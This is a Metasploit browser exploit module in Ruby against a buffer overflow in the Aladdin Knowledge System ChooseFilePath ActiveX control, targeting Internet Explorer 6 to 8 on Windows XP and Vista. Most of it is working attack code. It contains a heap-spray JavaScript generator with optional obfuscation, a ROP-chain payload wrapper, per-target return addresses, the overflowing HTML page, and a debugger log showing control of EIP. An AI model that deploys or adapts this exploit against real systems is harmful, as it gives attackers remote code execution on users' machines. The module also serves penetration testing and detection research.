##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Declares module metadata plus the browser/ActiveX requirements that
  # BrowserExploitServer matches against before a target entry is selected.
  #
  # Per-target keys consumed elsewhere in this file:
  #   'Rop'    - when true, exploit_template wraps the payload in a 'msvcrt' ROP chain
  #   'Offset' - hex string interpolated into the spray JavaScript by ie_heap_spray
  #   'Ret'    - value appended (little-endian, hex-escaped) to the overflowing
  #              string in exploit_template
  #
  # Defensive note: the clsid/method pair under 'BrowserRequirements' is the
  # indicator to key a kill-bit entry or a proxy/EDR signature on.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
      'Description' => %q{
        This module exploits a vulnerability found in Aladdin Knowledge System's
        ActiveX component. By supplying a long string of data to the ChooseFilePath()
        function, a buffer overflow occurs, which may result in remote code execution
        under the context of the user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'shinnai', #Vulnerability Discovery
          'b33f', #Original exploit
          'sinn3r', #Metasploit
          'juan vazquez' #Metasploit, IE8 target
        ],
      'References' =>
        [
          [ 'OSVDB', '86723' ],
          [ 'EDB', '22258' ],
          [ 'EDB', '22301' ]
        ],
      'Payload' =>
        {
          'StackAdjustment' => -3500
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Platform' => 'win',
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          :activex => [
            {
              clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
              method: "ChooseFilePath"
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
        },
      # Target table: the 'Automatic' entry carries no tuning and relies on the
      # browser requirements above; the remaining entries pin OS + MSIE version.
      'Targets' =>
        [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 6',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '6.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c
            }
          ],
          [
            'Windows XP with IE 7',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '7.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c
            }
          ],
          [
            'Windows XP with IE 8',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '8.0',
              'Rop' => true,
              'Offset' => '0x5f6',
              'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
            }
          ],
          [
            'Windows Vista with IE 7',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_VISTA,
              'ua_name' => 'MSIE',
              'ua_ver' => '7.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c
            }
          ]

        ],
      'Privileged' => false,
      'DisclosureDate' => '2012-04-01',
      'DefaultTarget' => 0))

    # OBFUSCATE is read in ie_heap_spray; default off.
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class
    )
  end


  # Builds the heapLib-based spray script that places the payload at 0x0c0c0c0c.
  #
  # The payload and a 4-byte 0x0c NOP string are emitted as JS unescape()
  # sequences; the target's 'Offset' is interpolated as the NOP prefix length.
  # The resulting script is passed through heaplib() and, when the OBFUSCATE
  # option is set, through JSObfu.
  #
  # @param p [String] raw payload bytes for the current target
  # @return [String] JavaScript source (a JSObfu object when OBFUSCATE is set,
  #   which the template interpolates via its to_s)
  def ie_heap_spray(p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
    # Randomized identifier for the NOP-string variable in the generated JS.
    randnop = rand_text_alpha(rand(100) + 1)

    # Land the payload at 0x0c0c0c0c

    js = %Q|
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{js_code}");
      var #{randnop} = "#{js_nops}";
      var nops = unescape(#{randnop});
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{get_target['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
    |

    # heaplib() prepends the heapLib helper; obfuscation of that helper is
    # disabled here and applied to the whole script below instead.
    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    return js
  end

  # Produces the HTML page served to the client together with the binding the
  # template engine uses to fill <%=spray%> and <%=target_ret%>.
  #
  # For targets with 'Rop' set the payload is wrapped in the 'msvcrt' ROP chain;
  # otherwise the plain payload is used. target_ret is the target's Ret value
  # packed as 32-bit little-endian ("V") and hex-escaped for the JS string.
  #
  # @param cli [Object] client connection passed through to get_payload
  # @param target_info [Hash] browser info passed through to get_payload
  # @return [Array(String, Binding)] template source and this method's binding
  def exploit_template(cli, target_info)

    if get_target['Rop']
      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
    else
      p = get_payload(cli, target_info)
    end

    spray = ie_heap_spray(p)
    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))

    html_template = %Q|
      <html>
      <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
      <script>
      <%=spray%>
      junk='';
      for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
      pwnd.ChooseFilePath(junk + "<%=target_ret%>");
      </script>
      </html>
    |

    return html_template, binding()
  end

  # BrowserExploitServer request callback: renders exploit_template for this
  # client and sends the resulting HTML.
  #
  # @param cli [Object] client connection
  # @param request [Object] incoming HTTP request (unused here)
  # @param target_info [Hash] browser info gathered by the server
  def on_request_exploit(cli, request, target_info)
    print_status("Sending HTML...")
    send_exploit_html(cli, exploit_template(cli, target_info))
  end
end
=begin
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
OLEAUT32!SysReAllocStringLen+0x31:
7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=????????
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0c0c0c0c ?? ???
0:008> db 020bf798
020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
=end